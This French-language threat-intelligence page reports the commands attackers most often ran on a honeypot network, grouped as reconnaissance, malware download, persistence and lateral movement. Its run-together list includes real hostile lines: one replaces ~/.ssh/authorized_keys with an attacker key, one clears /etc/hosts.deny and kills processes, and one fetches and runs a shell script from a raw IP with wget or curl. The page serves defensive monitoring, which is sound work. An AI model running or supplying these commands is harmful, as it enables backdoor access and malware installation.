Commandes Executees
Analyse en temps reel des commandes les plus executees par les attaquants apres avoir obtenu l'acces au systeme. Donnees collectees depuis notre reseau mondial de honeypots au cours des dernieres 24 heures.
Top Commandes Executees
Enter new UNIX password:uname -s -v -n -m 2 > /dev/nullexport PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc || grep -c "^processor" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-versionlockr -ia .sshcd ~; chattr -ia .ssh; lockr -ia .sshuname -acat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~cat /proc/uptime 2 > /dev/null | cut -d. -f1cat /proc/cpuinfo | grep name | wc -lunameuname -mfree -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'whoamiwcrontab -llscpu | grep Modeltopcat /proc/cpuinfo | grep model | grep name | wc -lwhich lsdf -h | head -n 2 | awk 'FNR == 2 {print $2;}'ls -lh $(which ls)uname -m 2 > /dev/nullrm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;/bin/./uname -s -v -n -r -muname -s -v -n -r -mcd /data/local/tmp/; wget http://140.233.190.82/cat.sh || curl http://140.233.190.82/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh androidthenif [ [ ! -d ${HOME}/.ssh ] ]nprocReconnaissance
Commandes pour collecter des informations systeme (uname, whoami, cat /etc/passwd)
Telechargement
Commandes pour telecharger des malwares (wget, curl, tftp)
Persistance
Commandes pour maintenir l'acces (crontab, chmod, chattr)
Mouvement Lateral
Commandes pour se propager dans le reseau (ssh, scp, ping)
A propos de ces donnees
Ces commandes sont capturees en temps reel lorsque les attaquants obtiennent acces a nos honeypots. Elles representent les techniques reelles utilisees dans les attaques automatisees et manuelles. Utilisez ces informations pour ameliorer votre detection des menaces et votre reponse aux incidents.